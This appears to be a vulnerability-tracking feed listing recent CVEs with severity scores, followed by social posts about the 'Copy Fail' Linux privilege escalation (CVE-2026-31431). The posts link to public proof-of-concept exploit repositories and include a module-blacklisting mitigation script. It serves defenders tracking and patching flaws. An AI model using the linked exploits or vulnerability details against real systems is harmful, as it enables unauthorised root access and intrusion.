| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-7418 | 8.8 | 0.00% | 2 | 0 | 2026-04-29T22:16:22.620000 | A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. Th | |
| CVE-2026-34965 | 8.8 | 0.00% | 2 | 0 | 2026-04-29T21:22:20.120000 | Cockpit CMS contains an authenticated remote code execution vulnerability in the | |
| CVE-2026-31431 | 7.8 | 0.01% | 52 | 7 | 2026-04-29T21:16:20.910000 | In the Linux kernel, the following vulnerability has been resolved: crypto: alg | |
| CVE-2026-6849 | 8.8 | 0.00% | 2 | 1 | 2026-04-29T21:13:30.563000 | Improper neutralization of special elements used in an OS command ('OS command i | |
| CVE-2026-7426 | 8.1 | 0.00% | 2 | 0 | 2026-04-29T20:16:32.143000 | Insufficient validation of the prefix length field in IPv6 Router Advertisement | |
| CVE-2026-7466 | 8.8 | 0.00% | 2 | 0 | 2026-04-29T19:16:27.013000 | AgentFlow contains an arbitrary code execution vulnerability that allows attacke | |
| CVE-2026-7424 | 8.1 | 0.00% | 2 | 0 | 2026-04-29T19:16:26.743000 | Integer underflow in the DHCPv6 sub-option parser in FreeRTOS-Plus-TCP before V4 | |
| CVE-2026-41940 | 9.8 | 0.00% | 7 | 2 | 2026-04-29T19:16:23.930000 | cPanel and WHM versions prior to 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0 | |
| CVE-2026-0204 | 8.0 | 0.00% | 2 | 0 | 2026-04-29T18:31:42 | A vulnerability in the access control mechanism of SonicOS may allow certain man | |
| CVE-2026-5712 | 8.1 | 0.00% | 2 | 0 | 2026-04-29T18:31:41 | This vulnerability impacts all versions of IdentityIQ and allows an authenticate | |
| CVE-2026-7344 | 8.8 | 0.01% | 1 | 0 | 2026-04-29T15:31:44 | Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727. | |
| CVE-2026-7343 | 9.8 | 0.03% | 1 | 0 | 2026-04-29T15:31:43 | Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo | |
| CVE-2026-5760 | 9.8 | 0.38% | 2 | 1 | 2026-04-29T15:31:38 | SGLang's reranking endpoint (/v1/rerank) achieves Remote Code Execution (RCE) wh | |
| CVE-2026-42515 | None | 0.05% | 2 | 0 | 2026-04-29T09:30:25 | This vulnerability exists in e-Sushrut due to improper access control in resourc | |
| CVE-2026-42615 | 7.2 | 0.01% | 2 | 0 | 2026-04-29T06:33:35 | GCHQ CyberChef before 11.0.0 allows XSS via Show Base64 offsets, as demonstrated | |
| CVE-2026-7321 | 9.7 | 0.04% | 2 | 0 | 2026-04-29T06:33:30 | Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co | |
| CVE-2026-23773 | 4.3 | 0.01% | 1 | 0 | 2026-04-29T04:16:40.867000 | Dell Disk Library for Mainframe, version(s) DLm 8700/2700 contain(s) a Server-Si | |
| CVE-2026-41873 | 9.8 | 0.12% | 2 | 0 | 2026-04-29T00:31:25 | ** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('H | |
| CVE-2026-42167 | 8.1 | 0.24% | 5 | 2 | 2026-04-29T00:30:29 | mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary | |
| CVE-2026-32202 | 4.3 | 7.19% | 13 | 0 | 2026-04-28T21:37:03 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-25874 | 9.8 | 0.11% | 6 | 0 | 2026-04-28T21:37:03 | LeRobot contains an unsafe deserialization vulnerability in the async inference | |
| CVE-2026-24222 | 8.6 | 0.04% | 2 | 0 | 2026-04-28T21:36:23 | NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati | |
| CVE-2026-24204 | 6.5 | 0.04% | 1 | 0 | 2026-04-28T21:36:23 | NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope | |
| CVE-2026-24186 | 8.8 | 0.06% | 2 | 0 | 2026-04-28T21:36:22 | NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause | |
| CVE-2026-24231 | 6.3 | 0.01% | 1 | 0 | 2026-04-28T21:36:22 | NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote | |
| CVE-2026-24178 | 9.8 | 0.14% | 2 | 0 | 2026-04-28T21:36:21 | NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut | |
| CVE-2024-1708 | 8.5 | 81.62% | 8 | 3 | 2026-04-28T21:34:00 | ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner | |
| CVE-2026-7202 | 9.8 | 0.89% | 2 | 0 | 2026-04-28T20:24:58.820000 | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This aff | |
| CVE-2026-7240 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T20:24:20.377000 | A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vul | |
| CVE-2026-38651 | 8.2 | 0.04% | 1 | 0 | 2026-04-28T20:23:20.703000 | Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. | |
| CVE-2026-7279 | 7.8 | 0.01% | 1 | 0 | 2026-04-28T20:22:38.260000 | AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi | |
| CVE-2025-67223 | 7.5 | 0.13% | 1 | 1 | 2026-04-28T20:18:13.020000 | The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be | |
| CVE-2026-20766 | 8.8 | 0.04% | 1 | 0 | 2026-04-28T20:11:56.713000 | An out-of-bounds memory access vulnerability exists in specific firmware version | |
| CVE-2026-40972 | 7.5 | 0.05% | 1 | 0 | 2026-04-28T20:11:56.713000 | An attacker on the same network as the remote application may be able to utilize | |
| CVE-2026-7320 | 7.5 | 0.03% | 1 | 0 | 2026-04-28T20:10:59.913000 | Information disclosure due to incorrect boundary conditions in the Audio/Video c | |
| CVE-2026-3893 | 9.4 | 0.06% | 1 | 0 | 2026-04-28T20:10:23.367000 | The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a | |
| CVE-2026-41384 | 7.8 | 0.01% | 1 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.24 contains an environment variable injection vulnerabili | |
| CVE-2026-41395 | 7.5 | 0.02% | 1 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 si | |
| CVE-2026-41396 | 7.8 | 0.01% | 1 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_B | |
| CVE-2026-42422 | 8.8 | 0.04% | 1 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.toke | |
| CVE-2026-42432 | 7.8 | 0.02% | 1 | 0 | 2026-04-28T20:10:23.367000 | OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing | |
| CVE-2026-3854 | 8.8 | 0.35% | 42 | 4 | 2026-04-28T19:37:39.507000 | An improper neutralization of special elements vulnerability was identified in G | |
| CVE-2026-42431 | None | 0.03% | 1 | 0 | 2026-04-28T18:30:21 | ## Impact OpenClaw `node.invoke(browser.proxy)` bypasses `browser.request` pers | |
| CVE-2026-42426 | None | 0.03% | 1 | 0 | 2026-04-28T18:28:53 | ## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead | |
| CVE-2026-42423 | None | 0.04% | 1 | 0 | 2026-04-28T18:28:19 | ## Impact strictInlineEval explicit-approval boundary bypassed by approval-time | |
| CVE-2026-41914 | None | 0.03% | 1 | 0 | 2026-04-28T18:26:36 | ## Impact QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. | |
| CVE-2026-41912 | None | 0.03% | 1 | 0 | 2026-04-28T18:25:57 | ## Impact Browser SSRF Policy Bypass via Interaction-Triggered Navigation. Bro | |
| CVE-2026-41405 | None | 0.14% | 1 | 0 | 2026-04-28T18:24:06 | ## Summary MS Teams webhook parses body before JWT validation, enabling unauthen | |
| CVE-2026-41404 | None | 0.07% | 1 | 0 | 2026-04-28T18:23:43 | ## Summary Incomplete scope-clearing fix allows operator.admin escalation via tr | |
| CVE-2026-41399 | None | 0.05% | 1 | 0 | 2026-04-28T18:22:28 | ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket | |
| CVE-2026-41394 | None | 0.05% | 1 | 0 | 2026-04-28T18:20:50 | ## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scop | |
| CVE-2026-41387 | 9.7 | 0.02% | 1 | 0 | 2026-04-28T18:18:46 | ## Summary Host exec env override sanitization did not fail closed for several | |
| CVE-2026-41386 | None | 0.03% | 1 | 0 | 2026-04-28T18:18:23 | ## Summary Bootstrap setup codes were not bound to the intended device role and | |
| CVE-2026-41383 | None | 0.04% | 1 | 0 | 2026-04-28T18:17:19 | ## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbi | |
| CVE-2026-41378 | None | 0.18% | 1 | 0 | 2026-04-28T18:15:32 | ## Summary Paired node escalates to gateway RCE via unrestricted node.event agen | |
| CVE-2026-41602 | 7.5 | 0.13% | 1 | 0 | 2026-04-28T15:31:54 | Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G | |
| CVE-2026-27760 | 8.1 | 0.10% | 1 | 0 | 2026-04-28T15:30:58 | OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in | |
| CVE-2026-7289 | 8.8 | 0.04% | 1 | 0 | 2026-04-28T15:30:58 | A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func | |
| CVE-2026-7288 | 8.8 | 0.04% | 1 | 0 | 2026-04-28T15:30:58 | A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff | |
| CVE-2026-5944 | 8.2 | 0.09% | 1 | 0 | 2026-04-28T15:30:52 | An improper access control vulnerability exists in the Cisco Intersight Device C | |
| CVE-2026-3323 | 7.5 | 0.01% | 1 | 0 | 2026-04-28T12:31:36 | An unsecured configuration interface on affected devices allows unauthenticated | |
| CVE-2026-7242 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T09:34:20 | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Impacted | |
| CVE-2026-7243 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T09:34:20 | A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe | |
| CVE-2026-7248 | 9.8 | 0.06% | 1 | 0 | 2026-04-28T09:34:20 | A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the functio | |
| CVE-2026-7244 | 9.8 | 0.89% | 1 | 0 | 2026-04-28T09:34:19 | A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The | |
| CVE-2026-5201 | 7.5 | 0.09% | 1 | 1 | 2026-04-28T09:34:12 | A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln | |
| CVE-2026-32644 | 9.8 | 0.02% | 2 | 0 | 2026-04-28T03:31:36 | Specific firmware versions of Milesight AIOT cameras use SSL certificates with d | |
| CVE-2026-7203 | 9.8 | 0.89% | 2 | 0 | 2026-04-28T03:31:36 | A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerab | |
| CVE-2026-7204 | 9.8 | 0.89% | 3 | 0 | 2026-04-28T03:31:36 | A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This iss | |
| CVE-2026-41371 | 8.5 | 0.04% | 1 | 0 | 2026-04-28T00:31:48 | OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat. | |
| CVE-2026-40976 | 9.1 | 0.04% | 4 | 0 | 2026-04-28T00:31:47 | In certain circumstances, Spring Boot's default web security is ineffective allo | |
| CVE-2026-27785 | 8.8 | 0.01% | 1 | 0 | 2026-04-28T00:31:47 | Specific firmware versions of Milesight AIOT camera firmware contain hard-coded | |
| CVE-2026-41364 | 8.1 | 0.15% | 1 | 0 | 2026-04-28T00:31:47 | OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sand | |
| CVE-2026-7160 | 8.8 | 0.29% | 1 | 0 | 2026-04-28T00:31:47 | A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the | |
| CVE-2026-31652 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T21:31:56 | In the Linux kernel, the following vulnerability has been resolved: mm/damon/st | |
| CVE-2026-31649 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T21:31:56 | In the Linux kernel, the following vulnerability has been resolved: net: stmmac | |
| CVE-2026-7155 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T21:31:12 | A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b202005 | |
| CVE-2026-7156 | 9.8 | 0.89% | 1 | 0 | 2026-04-27T21:31:12 | A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected i | |
| CVE-2026-30350 | 7.5 | 0.01% | 1 | 0 | 2026-04-27T21:31:02 | An issue in the /store/items/search endpoint of Agent Protocol server commit e9a | |
| CVE-2026-31669 | 9.8 | 0.07% | 1 | 0 | 2026-04-27T21:30:51 | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix | |
| CVE-2026-31667 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T21:30:51 | In the Linux kernel, the following vulnerability has been resolved: Input: uinp | |
| CVE-2026-31665 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T21:30:51 | In the Linux kernel, the following vulnerability has been resolved: netfilter: | |
| CVE-2026-31662 | 7.5 | 0.05% | 1 | 0 | 2026-04-27T21:30:50 | In the Linux kernel, the following vulnerability has been resolved: tipc: fix b | |
| CVE-2026-31657 | 9.8 | 0.06% | 1 | 0 | 2026-04-27T21:30:50 | In the Linux kernel, the following vulnerability has been resolved: batman-adv: | |
| CVE-2026-31648 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T21:30:49 | In the Linux kernel, the following vulnerability has been resolved: mm: filemap | |
| CVE-2026-31656 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:16:43.370000 | In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt | |
| CVE-2026-31650 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:14:35.180000 | In the Linux kernel, the following vulnerability has been resolved: mmc: vub300 | |
| CVE-2026-31666 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T20:00:27.157000 | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix | |
| CVE-2026-31663 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T19:59:32.810000 | In the Linux kernel, the following vulnerability has been resolved: xfrm: hold | |
| CVE-2026-42039 | 7.5 | 0.04% | 1 | 0 | 2026-04-27T19:50:46.320000 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15. | |
| CVE-2026-3008 | 6.6 | 0.01% | 1 | 3 | 2026-04-27T18:57:20.293000 | Successful exploitation of the string injection vulnerability could allow an att | |
| CVE-2026-31680 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: net: ipv6: | |
| CVE-2026-31676 | 7.5 | 0.04% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: rxrpc: only | |
| CVE-2026-31683 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T18:32:22.917000 | In the Linux kernel, the following vulnerability has been resolved: batman-adv: | |
| CVE-2026-33454 | 9.4 | 0.16% | 1 | 0 | 2026-04-27T18:32:06 | The Camel-Mail component is vulnerable to Camel message header injection. The cu | |
| CVE-2026-41635 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T18:32:05 | Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them | |
| CVE-2026-40860 | 9.8 | 0.50% | 1 | 0 | 2026-04-27T18:32:05 | JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding clas | |
| CVE-2026-31682 | 9.1 | 0.07% | 1 | 0 | 2026-04-27T15:31:59 | In the Linux kernel, the following vulnerability has been resolved: bridge: br_ | |
| CVE-2026-31685 | 9.4 | 0.05% | 1 | 0 | 2026-04-27T15:31:59 | In the Linux kernel, the following vulnerability has been resolved: netfilter: | |
| CVE-2026-31659 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T15:31:56 | In the Linux kernel, the following vulnerability has been resolved: batman-adv: | |
| CVE-2026-31678 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T15:30:51 | In the Linux kernel, the following vulnerability has been resolved: openvswitch | |
| CVE-2026-31675 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T15:30:51 | In the Linux kernel, the following vulnerability has been resolved: net/sched: | |
| CVE-2026-31673 | 7.8 | 0.01% | 1 | 0 | 2026-04-27T15:30:50 | In the Linux kernel, the following vulnerability has been resolved: af_unix: re | |
| CVE-2026-31668 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T15:30:47 | In the Linux kernel, the following vulnerability has been resolved: seg6: separ | |
| CVE-2026-31637 | 9.8 | 0.05% | 1 | 0 | 2026-04-27T15:30:46 | In the Linux kernel, the following vulnerability has been resolved: rxrpc: reje | |
| CVE-2026-40372 | 9.1 | 0.02% | 2 | 0 | 2026-04-24T19:59:44 | ## Executive Summary: A bug in `Microsoft.AspNetCore.DataProtection` 10.0.0-10 | |
| CVE-2026-41651 | 8.8 | 0.20% | 1 | 6 | 2026-04-24T13:43:37.347000 | PackageKit is a a D-Bus abstraction layer that allows the user to manage package | |
| CVE-2026-35431 | 10.0 | 0.09% | 1 | 0 | 2026-04-24T00:31:58 | Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management | |
| CVE-2026-5450 | 9.8 | 0.05% | 1 | 0 | 2026-04-23T18:32:57 | Calling the scanf family of functions with a %mc (malloc'd character match) in t | |
| CVE-2026-33626 | 7.5 | 0.04% | 1 | 0 | 2026-04-23T13:39:54.420000 | LMDeploy is a toolkit for compressing, deploying, and serving large language mod | |
| CVE-2026-3844 | 9.8 | 0.08% | 1 | 4 | 2026-04-23T04:00:28 | The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du | |
| CVE-2026-35369 | 5.5 | 0.02% | 1 | 0 | 2026-04-22T18:31:57 | An argument parsing error in the kill utility of uutils coreutils incorrectly in | |
| CVE-2026-22007 | 2.9 | 0.02% | 1 | 0 | 2026-04-22T15:31:39 | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Ente | |
| CVE-2026-5588 | 0 | 0.01% | 1 | 0 | 2026-04-21T16:16:20.540000 | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the | |
| CVE-2025-61260 | 9.8 | 0.10% | 1 | 0 | 2026-04-17T15:24:57.753000 | A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl | |
| CVE-2026-20148 | 4.9 | 0.06% | 1 | 0 | 2026-04-17T15:09:46.880000 | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem | |
| CVE-2026-40261 | 8.8 | 0.04% | 1 | 2 | 2026-04-16T21:55:08 | ### Impact The `Perforce::syncCodeBase()` method appended the `$sourceReference` | |
| CVE-2026-34197 | 8.8 | 65.07% | 2 | 9 | template | 2026-04-16T21:49:17 | Improper Input Validation, Improper Control of Generation of Code ('Code Injecti |
| CVE-2026-20147 | 10.0 | 0.28% | 1 | 0 | 2026-04-15T18:32:04 | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem | |
| CVE-2025-60751 | 7.5 | 0.02% | 1 | 1 | 2026-04-15T00:35:42.020000 | GeographicLib 2.5 is vulnerable to Buffer Overflow in GeoConvert DMS::InternalDe | |
| CVE-2026-40200 | 8.2 | 0.02% | 1 | 0 | 2026-04-10T18:31:28 | An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory co | |
| CVE-2026-6042 | 3.3 | 0.01% | 1 | 1 | 2026-04-10T12:31:44 | A security flaw has been discovered in musl libc up to 1.2.6. Affected is the fu | |
| CVE-2025-8065 | 6.5 | 0.08% | 2 | 0 | 2026-04-03T17:16:41.710000 | A stack-based buffer overflow vulnerability was identified in the ONVIF SOAP XML | |
| CVE-2026-35414 | 4.2 | 0.02% | 1 | 2 | 2026-04-02T18:31:50 | OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon | |
| CVE-2024-1709 | 10.0 | 94.32% | 1 | 7 | template | 2026-03-21T05:29:22 | ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Byp |
| CVE-2025-32432 | 10.0 | 87.87% | 1 | 4 | template | 2026-03-20T21:28:38 | ### Impact This is an additional fix for https://github.com/craftcms/cms/securi |
| CVE-2026-21510 | 8.8 | 3.35% | 1 | 1 | 2026-02-10T21:31:29 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-24061 | 9.8 | 87.77% | 1 | 69 | template | 2026-02-10T18:30:34 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2026-21509 | 7.8 | 10.86% | 1 | 12 | 2026-02-10T15:30:22 | Reliance on untrusted inputs in a security decision in Microsoft Office allows a | |
| CVE-2026-22704 | 8.0 | 0.02% | 1 | 0 | 2026-02-05T20:59:55.283000 | HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions | |
| CVE-2025-12383 | None | 0.04% | 1 | 0 | 2026-02-05T15:43:37 | In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori | |
| CVE-2026-24421 | 6.5 | 0.02% | 1 | 0 | 2026-01-28T04:43:47 | ### Summary Authenticated non‑admin users can call /api/setup/backup and trigger | |
| CVE-2025-68705 | 9.8 | 0.04% | 1 | 1 | 2026-01-16T19:29:47.410000 | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-a | |
| CVE-2025-68161 | None | 0.03% | 1 | 0 | 2025-12-19T22:08:03 | The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does | |
| CVE-2025-59250 | 8.1 | 0.08% | 1 | 0 | 2025-11-24T17:38:57 | Improper input validation in JDBC Driver for SQL Server allows an unauthorized a | |
| CVE-2025-48924 | 6.5 | 0.04% | 1 | 1 | 2025-11-05T20:30:33 | Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects | |
| CVE-2024-21413 | 9.8 | 92.99% | 1 | 35 | 2025-10-22T00:33:00 | Microsoft Outlook Remote Code Execution Vulnerability | |
| CVE-2019-1367 | 7.5 | 90.77% | 2 | 1 | 2025-10-22T00:32:47 | A remote code execution vulnerability exists in the way that the scripting engin | |
| CVE-2025-59536 | None | 0.03% | 1 | 4 | 2025-10-03T14:16:36 | Due to a bug in the startup trust dialog implementation, Claude Code could be tr | |
| CVE-2025-29787 | None | 0.33% | 1 | 0 | 2025-03-19T15:51:05 | ### Summary In the archive extraction routine of affected versions of the `zip | |
| CVE-2022-24138 | 7.8 | 0.28% | 1 | 0 | 2023-01-27T05:05:44 | IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download | |
| CVE-2025-6020 | 0 | 0.07% | 1 | 0 | N/A | ||
| CVE-2026-25262 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-42208 | 0 | 0.00% | 4 | 1 | N/A | ||
| CVE-2026-5545 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-6429 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-7168 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-6253 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-41649 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2025-54136 | 0 | 0.11% | 1 | 1 | N/A | ||
| CVE-2026-35177 | 0 | 0.01% | 1 | 0 | N/A |
updated 2026-04-29T22:16:22.620000
2 posts
🟠 CVE-2026-7418 - High (8.8)
A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7418/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-7418 - High (8.8)
A vulnerability was determined in UTT HiPER 1250GW up to 3.2.7-210907-180535. This vulnerability affects the function strcpy of the file route/goform/NTP. Executing a manipulation of the argument Profile can lead to buffer overflow. The attack may...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7418/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T21:22:20.120000
2 posts
🟠 CVE-2026-34965 - High (8.8)
Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-34965/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-34965 - High (8.8)
Cockpit CMS contains an authenticated remote code execution vulnerability in the /cockpit/collections/save_collection endpoint that allows authenticated attackers with collection management privileges to inject arbitrary PHP code into collection r...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-34965/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-04-29T21:16:20.910000
52 posts
7 repos
https://github.com/Theori-lO/copy-fail-CVE-2026-31431
https://github.com/rootsecdev/cve_2026_31431
https://github.com/badsectorlabs/copyfail-go
https://github.com/Alfredooe/CVE-2026-31431
https://github.com/mhdgning131/CVE-2026-31431_poc
Copy Fail – CVE-2026-31431
https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
CVE-2026-31431 is a Linux LPE, PoC script roots every distribution shipped since 2017 https://copy.fail/
##This is bad…
---
CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.
This is what I'm pasting into my own linux systems to implement the mitigation #cve_2026_31431 suggested at the #copyfail website.
It may not be right for you. The 'chattr +i' may make it more difficult to undo!
MIT license, or at least its disclaimers, apply.
f=disable-algif_aead-CVE-2026-31431.conf
if ! [ -d /etc/modprobe.d ]; then
printf 'This system does not seem to have a /etc/modprobe.d dir, so this script would need to be adapted.\n' >&2
return 74
else
sudo /bin/env -i /bin/sh -c 'set -x;set -e;cd /etc/modprobe.d;umask 133;printf '\''install algif_aead /bin/false\n'\'' >'"$f"';chattr +i '"$f"
fi
sudo /bin/env -i /bin/sh -c '(set -x;rmmod -v algif_aead)2>&1|grep -v "is not currently loaded"'
ls -l /etc/modprobe.d/$f
cat -t /etc/modprobe.d/$f
🚨 CVE-2026-31431 (Copy Fail)
In the Linux kernel, the following vulnerability has been resolved:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of the associated data.
There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings. Get rid of all the complexity added for in-place operation and just copy the AD directly.
ℹ️ Additional info on ZEN SecDB https://secdb.nttzen.cloud/cve/detail/CVE-2026-31431
#nttdata #zen #secdb #infosec
#copyfail #cve202631431 #linux #kernel
@krypt3ia @Viss https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
##Copy Fail — CVE-2026-31431 Linux Privilege Escalation https://copy.fail/
##Copy Fail – CVE-2026-31431: https://copy.fail/
Discussion: http://news.ycombinator.com/item?id=47952181
##Copy Fail – CVE-2026-31431 https://copy.fail/
##Wir checken Eure Linux-Distro! Kommt beim nächsten #DiDay mit euren abgehangenen 5-er Kerneln vorbei und wir halten Händchen, während wir gemeinsam exploit.py von CVE-2026-31431 ausführen.
##https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py
##Copy Fail – CVE-2026-31431: https://copy.fail/
Discussion: http://news.ycombinator.com/item?id=47952181
##Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
Hello
I am here to ruin your day again
https://copy.fail/ / CVE-2026-31431
Seems RHEL don't think this is all that important, CloudLinux's kernel image (presumably derived from RHEL) has the problem module built in, so you can't even mitigate while we wait for patching. CageFS does help as - afaict - no setuid binaries are included in the default cagefs env. Many Debian versions lack a patch at time of writing, but blocking the module did work for me.
##@mttaggart And yet RHEL has "fix deferred" for all affected OSes.
Looks like it requires a local user account, with a password set, to exploit, yes?
##RE: https://hachyderm.io/@petrillic/116489574280084326
I have had a confirmation that it can work on the Amazon Linux kernel, but also RHEL says "fix deferred" for all affected RHEL versions: https://access.redhat.com/security/cve/cve-2026-31431
##Copy Fail – CVE-2026-31431: https://copy.fail/
Discussion: http://news.ycombinator.com/item?id=47952181
##I’m a bit surprised they did not wait till a patch was available for the major distros. Smells like an IPO or the next round of funding is coming soon.
You probably want to keep a close eye on any system you maintain where unprivileged users have shell access and update as soon as possible.
https://security-tracker.debian.org/tracker/CVE-2026-31431
https://ubuntu.com/security/CVE-2026-31431
##Ooooh, nice:
https://xint.io/blog/copy-fail-linux-distributions
CVE-2026-31431: Local privilege escalation to root using a trivial 732 byte python script for pretty much every Linux distribution since 2017.
##Copy Fail – CVE-2026-31431
https://news.ycombinator.com/item?id=47952181
Hm https://security-tracker.debian.org/tracker/CVE-2026-31431
##Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Discussion: https://news.ycombinator.com/item?id=47952181
Copy Fail – CVE-2026-31431
Link: https://copy.fail/
Comments: https://news.ycombinator.com/item?id=47952181
📰 Today's Top 21 Hacker News Stories (Sorted by Score) 📰
----------------------------------------
🔖 Title: Ghostty is leaving GitHub
🔗 URL: https://mitchellh.com/writing/ghostty-leaving-github
👍 Score: [3244]
💬 Discussion: https://news.ycombinator.com/item?id=47939579
